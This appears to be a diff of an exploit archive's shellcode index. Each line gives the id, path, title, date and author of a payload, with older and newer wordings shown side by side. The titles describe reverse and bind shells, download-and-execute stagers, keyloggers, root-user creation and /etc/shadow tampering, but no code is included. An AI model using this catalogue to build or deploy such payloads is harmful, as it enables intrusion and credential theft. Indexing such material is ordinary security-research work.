37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
@ -529,16 +529,16 @@ id,file,description,date,author,type,platform
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
@ -547,7 +547,7 @@ id,file,description,date,author,type,platform
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
@ -555,25 +555,25 @@ id,file,description,date,author,type,platform
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
@ -581,26 +581,26 @@ id,file,description,date,author,type,platform
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
@ -613,11 +613,11 @@ id,file,description,date,author,type,platform
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) + Null-Free Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
@ -667,7 +667,7 @@ id,file,description,date,author,type,platform
43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
43670,shellcodes/linux_x86/43670.c,"Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)",2009-01-01,bob,shellcode,linux_x86
43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86
43672,shellcodes/generator/43672.c,"Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
@ -682,8 +682,8 @@ id,file,description,date,author,type,platform
43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43689,shellcodes/linux_x86/43689.c,"Linux/x86 - sync Shellcode (6 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
43694,shellcodes/linux_x86/43694.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)",2018-01-14,"Hashim Jawad",shellcode,linux_x86
43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86
43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86
@ -691,8 +691,7 @@ id,file,description,date,author,type,platform
43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
43701,shellcodes/linux_x86/43701.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,"John Babio",shellcode,linux_x86
43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)",2009-01-01,Kernel_Panik,shellcode,linux_x86
43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,Kernel_Panik,shellcode,linux_x86
